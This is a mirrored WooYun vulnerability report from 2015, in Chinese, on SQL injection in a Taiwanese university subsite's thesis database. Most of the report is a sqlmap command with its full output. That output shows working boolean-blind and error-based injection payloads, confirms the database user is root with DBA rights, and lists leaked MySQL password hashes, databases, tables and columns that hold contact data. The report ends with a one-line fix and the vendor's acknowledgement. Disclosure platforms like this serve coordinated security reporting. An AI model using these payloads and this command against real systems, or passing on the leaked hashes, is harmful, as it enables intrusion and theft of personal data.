乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-12: 细节向公众公开
台湾铭傅大学某分站存在sql注射漏洞(DBA权限/root密码泄露)
测试地址:http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109
python sqlmap.py -u "http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109" -p URN --technique=BE --random-agent --batch --current-user --is-dba --users --passwords
---Parameter: URN (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar---web server operating system: Linux Mandriva 2008web application technology: Apache 2.2.6back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [2]:[*] 'root'@'localhost'[*] 'skyman'@'localhost'database management system users password hashes:[*] root [1]: password hash: 634257d56a847967[*] skyman [1]: password hash: 36ead6da63c566efsqlmap resumed the following injection point(s) from stored session:---Parameter: URN (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar---web server operating system: Linux Mandriva 2008web application technology: Apache 2.2.6back-end DBMS: MySQL 5.0available databases [8]:[*] etd_available[*] etd_global[*] etd_qnaire[*] etd_submitted[*] information_schema[*] mysql[*] test[*] tmpsqlmap resumed the following injection point(s) from stored session:---Parameter: URN (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar---web server operating system: Linux Mandriva 2008web application technology: Apache 2.2.6back-end DBMS: MySQL 5.0Database: etd_available[7 tables]+---------------------+| advisor_by_urn || etd_db_availability || etd_main || filename_by_urn || keyword_by_urn || keyword_c_by_urn || oai_record |+---------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: URN (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: URN=etd-0626106-123109' AND 7469=7469 AND 'jBqi'='jBqi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: URN=etd-0626106-123109' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(2067=2067,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zgar'='zgar---web server operating system: Linux Mandriva 2008web application technology: Apache 2.2.6back-end DBMS: MySQL 5.0Database: etd_availableTable: etd_db_availability[7 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| DB_address | varchar(100) || DB_availability | varchar(30) || DB_email | varchar(100) || DB_grant_choice | varchar(30) || DB_opendate | date || DB_phone | varchar(20) || urn | varchar(30) |+-----------------+--------------+
增加过滤。
危害等级:高
漏洞Rank:18
确认时间:2015-10-27 23:58
感謝通報
暂无